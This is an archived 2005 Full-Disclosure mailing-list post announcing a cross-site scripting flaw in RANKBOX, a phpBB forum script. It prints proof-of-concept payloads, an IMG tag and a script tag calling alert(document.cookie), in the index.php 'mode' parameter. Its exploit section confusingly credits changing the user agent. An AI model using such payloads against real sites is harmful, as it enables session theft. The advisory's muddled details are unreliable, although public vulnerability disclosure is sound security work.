lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 07 Nov 2005 13:29:41 -0800
From: "spyburn mexico rlz" <spy-burn@...mail.com>
To: pen-test@...ts.securityfocus.com, vuln-dev@...urityfocus.com,
	pen-test@...urityfocus.com, security-basics@...urityfocus.com,
	nmap-hackers@...ecure.org, full-disclosure@...ts.grok.org.uk,
	bugtraq@...urityfocus.com
Subject: RANKBOX <= XSS vulnerability


#####################################################################################
#										    #
# Advisory #1   Title:                                                       
        #
# "RANKBOX <= XSS vulnerability"                                             
        #
#								  		    #
# Author: spyburn						               	    #
# Contact: spy-burn@...mail.com			                                    #
# Website: elitemexico.org							    #
# Date: 07/11/2005								    #
# Risk: High									    #
# Vendor Url: http://chamberofgold.com						    #
# Affected Software: RANKBOX	                                                
     #
# Non Affected: 				                          	    #
#										    #
# We Are: ELITE MEXICO                                         			    #
#####################################################################################
---------------------------------------------------------

:: Description ::
script for forums phpbb

---------------------------------------------------------
####################
:: Vulnerabilitie ::
####################
- | "xss" | -

directori afeccted is /index.php?mode=<IMG SRC=http://site.com/image.jpg>
                     /index.php?mode=<script>alert(document.cookie)</script>
--------------------------------------------------------
############
::Exploit::
############
no exploit is requiered, the only think you need to do is change your user 
agent


----------------------------------------------------------
#######
GREETZ
#######
Visit: www.elitemexico.org

greetz: raza mexicana, mexican hackers mafia , cum, fraude, 0o_zeus_o0
#############################################################

_________________________________________________________________
MSN Premium. Protégete, Comunícate y Diviértete  
http://join.msn.com/?pgmarket=es-mx&page=byoa/prem&xAPID=989&DI=233&SU=http://www.t1msn.com.mx/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists